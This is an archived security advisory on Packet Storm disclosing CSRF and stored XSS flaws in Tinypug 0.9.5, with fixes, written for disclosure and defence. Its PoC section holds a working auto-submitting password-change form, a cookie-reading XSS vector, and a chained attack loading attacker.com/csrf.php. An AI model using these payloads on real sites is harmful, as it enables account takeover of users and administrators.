exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Tinypug 0.9.5 Cross Site Request Forgery / Cross Site Scripting

Tinypug 0.9.5 Cross Site Request Forgery / Cross Site Scripting
Posted Feb 3, 2010
Authored by AmnPardaz Security Research Team | Site bugreport.ir

Tinypug versions 0.9.5 and below suffer from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | a01fc3dd1197cdeee84f6202482ccc79cdcb7aa9e0ce6801fe528afbb637238b

Tinypug 0.9.5 Cross Site Request Forgery / Cross Site Scripting

Change Mirror Download
##########################www.BugReport.ir########################################
#
# AmnPardaz Security Research Team
#
# Title: Tinypug Multiple Vulnerabilities
# Vendor: http://platformassociates.com/
# (project hosted at http://code.google.com/p/tinypug/)
# Vulnerable Version: 0.9.5 (and prior versions)
# Exploitation: Remote with browser
# Fix: N/A
###################################################################################

####################
- Description:
####################

Tinypug is a system for building portals that enable innovation
communities and customer inquiry.
The idea is to go beyond one-off statistical surveys (which tend to
only verify an existing paradigm)
to foster real collaboration, scalable two-way communication, and
anecdotal feedback from users/customers.


####################
- Vulnerability:
####################

+--> CSRF (Cross-Site Request Forgery)
The password changing page is vulnerable to CSRF attack. This vulnerability
can be used to change the password of the victim. For details of this
process see "Exploits/PoCs" section.

+--> Stored XSS Vulnerability
The comment page is vulnerable to Stored XSS attack. But comments
will be published
only after administrator confirmation. However this XSS vulnerablity can be
used in conjunction with the more serious security whole (CSRF) in
order to change
administrator's password.

####################
- Exploits/PoCs:
####################

+--> Exploiting The CSRF Vulnerability:
As any CSRF attack, you need victim to be logged in at target site,
namely "victim.com",
and visits the attacker's site, namely "attacker.com".
Then attacker can change password of the victim (for example to
"the-new-password")
by presenting following code at attacker.com site:
<div>
<iframe id="if1" name="if1" style="display:none">
This frame is invisible!!
</iframe>
<form action="http://victim.com/tinypug-0.9.5/profiles/change_password"
method="post" id="the_form" style="display:none" target="if1">
<input type="password" name="password" value="the-new-password" />
<input type="password" name="password2" value="the-new-password" />
<input type="submit" value="Change Password" />
</form>
<script type="text/javascript">
//<![CDATA[
var $form = document.getElementById ('the_form');
$form.submit ();
//]]>
</script>
</div>

+--> Exploiting The Stored XSS Vulnerability:
Simply go to the comment page of a post
(for example at
"http://victim.com/tinypug-0.9.5/stories/view/welcome#comments")
and embed any desired XSS vector like <script>alert(document.cookie)</script>
But be aware that comments will be reviewed by administrators before
publishing.

+--> Changing Administrator Password by combining above Vulnerabilities:
Using the Stored XSS attack, make administrator to see following code:

My comment !!! <iframe id="f2" name="f2"
src="http://attacker.com/csrf.php" style="display:none" />

Then whether he/she approve your comment or not :) his/her password
will be changed
to "the-new-password" via CSRF attack by visiting implicitly
the "http://attacker.com/csrf.php" URI.

####################
- Original Advisory:
####################

http://www.bugreport.ir/index_67.htm

####################
- Solution:
####################

For CSRF vulnerability password changing page must be changed in order
to ask for the old password, too.

For XSS vulnerability you could include all of the comments in the
approval page by <xmp> tag.


####################
- Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com

Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close